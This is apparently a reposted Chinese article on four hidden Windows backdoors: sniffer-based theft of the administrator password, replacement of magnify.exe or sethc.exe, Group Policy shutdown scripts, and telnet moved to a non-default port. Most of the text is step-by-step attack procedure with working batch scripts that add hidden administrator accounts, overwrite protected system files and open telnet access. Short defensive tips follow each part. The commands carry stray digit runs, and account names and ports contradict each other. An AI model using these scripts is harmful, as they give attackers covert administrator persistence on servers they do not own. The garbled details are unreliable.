后門(mén)是攻擊者出入系統(tǒng)的通道,,惟其如此它隱蔽而危險(xiǎn)。攻擊者利用后門(mén)技術(shù)如入無(wú)人之境,,這是用戶的恥辱,。針對(duì)Windows系統(tǒng)的后門(mén)是比較多的,對(duì)于一般的后門(mén)也為大家所熟知,。下面筆者揭秘四個(gè)可能不為大家所了解但又非常危險(xiǎn)的后門(mén),。
1、嗅探欺騙,,最危險(xiǎn)的后門(mén)
這類(lèi)后門(mén)是攻擊者在控制了主機(jī)之后,,并不創(chuàng)建新的帳戶而是在主機(jī)上安裝嗅探工具竊取管理員的密碼,。由于此類(lèi)后門(mén),并不創(chuàng)建新的帳戶而是通過(guò)嗅探獲取的管理員密碼登錄系統(tǒng),,因此隱蔽性極高,,如果管理員安全意識(shí)不高并缺少足夠的安全技能的話是根本發(fā)現(xiàn)不了的。
(1)安裝嗅探工具
攻擊者將相應(yīng)的嗅探工具上傳或者下載到服務(wù)器,,然后安裝即可,。需要說(shuō)明的是這些嗅探工具一般體積很小并且功能單一,但是往往被做成驅(qū)動(dòng)形式的,,所以隱蔽性極高,,很難發(fā)現(xiàn)也不宜清除。
(2)獲取管理員密碼
嗅探工具對(duì)系統(tǒng)進(jìn)行實(shí)施監(jiān)控,,當(dāng)管理員登錄服務(wù)器時(shí)其密碼也就被竊取,,然后嗅探工具會(huì)將管理員密碼保存到一個(gè)txt文件中。當(dāng)攻擊者下一次登錄服務(wù)器后,,就可以打開(kāi)該txt文件獲取管理員密碼,。此后他登錄服務(wù)器就再不用重新創(chuàng)建帳戶而是直接用合法的管理員帳戶登錄服務(wù)器。如果服務(wù)器是一個(gè)Web,,攻擊者就會(huì)將該txt文件放置到某個(gè)web目錄下,,然后在本地就可以瀏覽查看該文件了。
(3)防范措施
嗅探后門(mén)攻擊者以正常的管理員帳戶登錄系統(tǒng),,因此很難發(fā)現(xiàn),,不過(guò)任何入侵都會(huì)留下蛛絲馬跡,我們可以啟用組策略中的“審核策略”使其對(duì)用戶的登錄情況進(jìn)行記錄,,然后通過(guò)事件查看器查看是否有可疑時(shí)間的非法登錄,。不過(guò),一個(gè)高明的攻擊者他們會(huì)刪除或者修改系統(tǒng)日志,,因此最徹底的措施是清除安裝在系統(tǒng)中的嗅探工具,,然后更改管理員密碼。
2,、放大鏡程序,,最狡猾的后門(mén)
放大鏡(magnify.exe)是Windows 2000/XP/2003系統(tǒng)集成的一個(gè)小工具,它是為方便視力障礙用戶而設(shè)計(jì)的,。在用戶登錄系統(tǒng)前可以通過(guò)“Win+U”組合鍵調(diào)用該工具,,因此攻擊者就用精心構(gòu)造的magnify.exe同名文件替換放大鏡程序,從而達(dá)到控制服務(wù)器的目的,。
通常情況下,,攻擊者通過(guò)構(gòu)造的magnify.exe程序創(chuàng)建一個(gè)管理員用戶,然后登錄系統(tǒng),。當(dāng)然有的時(shí)候他們也會(huì)通過(guò)其直接調(diào)用命令提示符(cmd.exe)或者系統(tǒng)shell(explorer.exe),。需要說(shuō)明的是,,這樣調(diào)用的程序都是system權(quán)限,即系統(tǒng)最高權(quán)限,。不過(guò),,以防萬(wàn)一當(dāng)管理員在運(yùn)行放大鏡程序時(shí)發(fā)現(xiàn)破綻,攻擊者一般通過(guò)該構(gòu)造程序完成所需的操作后,,最后會(huì)運(yùn)行真正的放大鏡程序,,以蒙騙管理員。其利用的方法是:
思路:偽造替換 magnify.exe
(1) 構(gòu)造批處理腳本:magnify.bat
@echo off net user hack$ test168 /add net localgroup administrators hack$ /add %Windir%\system32\nagnify.exe exit12345
作用:先創(chuàng)建管理員用戶,,在運(yùn)行原來(lái)的放大鏡程序
(2)文件格式轉(zhuǎn)換
因?yàn)榕幚砦募agnify.bat的后綴是bat,,必須要將其轉(zhuǎn)換為同名的exe文件才可以通過(guò)組合鍵Win+U調(diào)用,。攻擊者一般可以利用WinRar構(gòu)造一個(gè)自動(dòng)解壓的exe壓縮文件,,當(dāng)然也可以利用bat2com、com2exe進(jìn)行文件格式的轉(zhuǎn)換,。我們就以后面的方法為例進(jìn)行演示,。利用bat2com / com2exe,BatToEXE(圖形化工具)等工具把Bat文件轉(zhuǎn)換成exe文件,,如:
bat2com magnify.bat 將magnify.bat轉(zhuǎn)換成magnify.com com2exe magnify.com 將magnify.com轉(zhuǎn)換成magnify.exe12
(3)放大鏡文件替換
下面就需要用構(gòu)造的magnify.exe替換同名的放大鏡程序文件,,由于Windows對(duì)系統(tǒng)文件的自我保護(hù),因此不能直接替換,,不過(guò)Windows提供了一個(gè)命令replace.exe,,通過(guò)它我們可以替換系統(tǒng)文件。另外,,由于系統(tǒng)文件在%Windir%\system32\dllcache中有備份,,為了防止文件替換后又重新還原,所有我們首先要替換該目錄下的magnify.exe文件,。假設(shè)構(gòu)造的magnify.exe文件在%Windir%目錄下,,我們可以通過(guò)一個(gè)批處理即可實(shí)現(xiàn)文件的替換。
@echo off copy %Windir%\system32\dllcache\magnify.exe nagnify.exe 將放大鏡程序備份為nagnify.exe copy %Windir%\system32\magnify.exe nagnify.exe replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache 替換放大鏡程序 replace.exe %Windir%\magnify.exe %Windir%\system32 exit123456
上面批處理的功能是,,首先將放大鏡程序備份為nagnify.exe,,然后用同名的構(gòu)造程序?qū)⑵涮鎿Q。
(4)攻擊利用
當(dāng)完成上述操作后,,一個(gè)放大鏡后門(mén)就做成了,。然后攻擊者通過(guò)遠(yuǎn)程桌面連接服務(wù)器,在登錄界面窗口摁下本地鍵盤(pán)的“Win+U”組合鍵,,選擇運(yùn)行其中的“放大鏡”,,此刻就在服務(wù)器上創(chuàng)建了一個(gè)管理員用戶gslw$并打開(kāi)了放大鏡工具,然后攻擊者就開(kāi)業(yè)通過(guò)該帳戶登錄服務(wù)器,。當(dāng)然,,攻擊者在斷開(kāi)登錄前會(huì)刪除所有與該帳戶相關(guān)的信息,,以防被管理員發(fā)現(xiàn)。
(5)防范措施
進(jìn)入%Windir%\system32\查看magnify.exe的文件圖標(biāo)是否是原來(lái)的放大鏡的圖標(biāo),,如果不是的話極有可能被植入了放大鏡后門(mén),。當(dāng)然,有的時(shí)候攻擊者也會(huì)將其文件圖標(biāo)更改為和原放大鏡程序的圖標(biāo)一樣,。此時(shí)我們可以查看magnify.exe文件的大小和修改時(shí)間,,如果這兩樣有一項(xiàng)不符就比較懷疑了。我們也可以先運(yùn)行magnify.exe,,然后運(yùn)行l(wèi)usrmgr.msc查看是否有可疑的用戶,。如果確定服務(wù)器被放置了放大鏡后門(mén),首先要?jiǎng)h除該文件,,然后恢復(fù)正常的放大鏡程序,。當(dāng)然,我們也可以做得更徹底一些,,用一個(gè)無(wú)關(guān)緊要的程序替換放大鏡程序,。甚至我們也可以以其人之道還治其人之身,構(gòu)造一個(gè)magnify.exe,,通過(guò)其警告攻擊者或者進(jìn)行入侵監(jiān)控和取證,。
補(bǔ)充:與放大鏡后門(mén)類(lèi)似的還有“粘滯鍵”后門(mén),即按下SHIEF鍵五次可以啟動(dòng)粘滯鍵功能,,其利用和防范措施與放大鏡后門(mén)類(lèi)似,,只是將magnify.exe換成了sethc.exe。
3,、組策略欺騙,,最隱蔽的后門(mén)
相對(duì)來(lái)說(shuō),組策略后門(mén)更加隱蔽,。往冊(cè)表中添加相應(yīng)鍵值實(shí)現(xiàn)隨系統(tǒng)啟動(dòng)而運(yùn)行是木馬常用的伎倆,,也為大家所熟知。其實(shí),,在最策略中也可以實(shí)現(xiàn)該功能,,不僅如此它還可以實(shí)現(xiàn)在系統(tǒng)關(guān)機(jī)時(shí)進(jìn)行某些操作。這就是通過(guò)最策略的“腳本(啟動(dòng)/關(guān)機(jī))”項(xiàng)來(lái)說(shuō)實(shí)現(xiàn),。具體位置在“計(jì)算機(jī)配置→Windows設(shè)置”項(xiàng)下,。因?yàn)槠錁O具隱蔽性,因此常常被攻擊者利用來(lái)做服務(wù)器后門(mén),。
攻擊者獲得了服務(wù)器的控制權(quán)就可以通過(guò)這個(gè)后門(mén)實(shí)施對(duì)對(duì)主機(jī)的長(zhǎng)期控制,。它可以通過(guò)這個(gè)后門(mén)運(yùn)行某些程序或者腳本,最簡(jiǎn)單的比如創(chuàng)建一個(gè)管理員用戶,,他可以這樣做:
(1)創(chuàng)建腳本
echo off net user hack$ test168 /add net localgroup administrators hack$ /add exit1234
(2)后門(mén)利用
在“運(yùn)行”對(duì)話框中輸入gpedit.msc,,定位到“計(jì)算機(jī)配置一>Windows設(shè)置一>腳本(啟動(dòng)/關(guān)機(jī))”, 雙擊右邊窗口的“關(guān)機(jī)”,,在其中添加add.bat。就是說(shuō)當(dāng)系統(tǒng)關(guān)機(jī)時(shí)創(chuàng)建gslw$用戶,。對(duì)于一般的用戶是根本不知道在系統(tǒng)中有一個(gè)隱藏用戶,,就是他看見(jiàn)并且刪除了該帳戶,當(dāng)系統(tǒng)關(guān)機(jī)時(shí)又會(huì)創(chuàng)建該帳戶,。所以說(shuō),,如果用戶不知道組策略中的這個(gè)地方那他一定會(huì)感到莫名其妙。
其實(shí),,對(duì)于組策略中的這個(gè)“后門(mén)”還有很多利用法,,攻擊者通過(guò)它來(lái)運(yùn)行腳本或者程序,嗅探管理員密碼等等,。當(dāng)他們獲取了管理員的密碼后,,就不用在系統(tǒng)中創(chuàng)建帳戶了,直接利用管理員帳戶遠(yuǎn)程登錄系統(tǒng),。因此它也是“雙刃劍”,,希望大家重視這個(gè)地方,。當(dāng)你為服務(wù)器被攻擊而莫名其妙時(shí),,說(shuō)不定攻擊者就是通過(guò)它實(shí)現(xiàn)的。
4,、telnet欺騙,,最容易被忽略的后門(mén)
telnet是命令行下的遠(yuǎn)程登錄工具,不過(guò)在服務(wù)器管理時(shí)使用不多也常為管理員所忽視,。攻擊者如果在控制一臺(tái)服務(wù)器后,,開(kāi)啟“遠(yuǎn)程桌面”進(jìn)行遠(yuǎn)程控制非常容易被管理員察覺(jué),但是啟動(dòng)Telnet進(jìn)行遠(yuǎn)程控制卻不容易被察覺(jué),。不過(guò),,telnet的默認(rèn)端口是23,如果開(kāi)啟后,,別人是很容易掃描到的,,因此攻擊者會(huì)更改telnet的端口,從而獨(dú)享該服務(wù)器的控制權(quán),。
(1)修改端口
tlntadmn config port=2233 //修改 telnet默認(rèn)端口(初始23) sc config tlntsvr start= auto net start telnet123
一個(gè)批處理,可以根據(jù)需要修改,。轉(zhuǎn)換成exe等等,思路很多,。,。。
@echo off sc config tlntsvr start= auto @net start telnet @tlntadmn config sec =passwd @tlntadmn config port = 2233 @net user hack& 123456789 /add @net localgroup administrators hack$ /add @pause @md c:\windows\ShareFolder @net share MyShare=c:\windows\ShareFolder12345678910
(2)遠(yuǎn)程登錄
攻擊者在本地運(yùn)行命令提示符(cmd.exe)輸入命令“telnet 192.168.1.9 800”然后輸入用戶名及其密碼記錄telnet到服務(wù)器,。
(3)防范措施
對(duì)于telnet后門(mén)的方法非常簡(jiǎn)單,,可以通過(guò)“tlntadmn config port=n”命令更改其端口,,更徹底的運(yùn)行“services.msc”打開(kāi)服務(wù)管理器,禁用telnet服務(wù),。
總結(jié)
其實(shí),,不管什么樣的后門(mén)都有一個(gè)共同的特點(diǎn)——隱蔽性,是見(jiàn)不得陽(yáng)光的,。只要大家掌握一定的系統(tǒng)技術(shù),,并時(shí)刻提高警惕就能讓后門(mén)顯形。知己知彼,,了解后門(mén)的原理,,就能夠從根本上終結(jié)后門(mén)。
